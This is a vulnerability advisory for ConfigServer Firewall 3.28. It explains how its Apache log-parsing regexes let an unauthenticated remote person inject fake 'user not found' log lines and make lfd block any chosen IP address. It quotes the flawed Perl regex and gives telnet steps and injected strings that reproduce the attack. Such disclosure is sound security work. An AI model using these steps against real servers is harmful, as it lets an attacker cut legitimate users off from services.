CSF 3.28 - remotely block any IP address (Apache 1.x and Apache 2.x regexps)



DESCRIPTION


ConfigServer Firewall 3.28 provides the option to block brute force login attempts on various services. regexps in csf/regexp.pm for modsec v1 and modsec v2 allowed any remote, unauthenticated person to block any IP address of their choice. The code for this looked similar to the following:

 84     if ( $log_line =~ /\[client (\d+\.\d+\.\d+\.\d+)\] user .* not found:/ ) {
 85         return ( 'Unsuccessful http auth from', $1, 'htpasswd');
 86     }



IMPACT


Remote, unauthenticated persons could block any IP address of their choice.


The following steps can be used to take advantage of this issue:

Do this 5 times:

1. telnet <victim server> 80

2. enter the following, hit enter 2 x's after:
[client 1.2.3.4] user not found:


This also worked via the Apache v1 regexp. In step 2 above, you would use the following:

[client 1.2.3.4] user : authentication failure


This is what the httpd error_log would normally look like when attempting to log in with an unknown user ("alice" in this example):

[Wed Sep 09 02:15:22 2009] [error] [client 1.1.1.1] user alice not found: /

and this is what the logs looks like when you issue the command from step 2 above:

[Wed Sep 09 02:23:10 2009] [error] [client 1.1.1.1] Invalid URI in request [client 1.2.3.4] user not found:


The result will be that lfd calls iptables to block 1.2.3.4.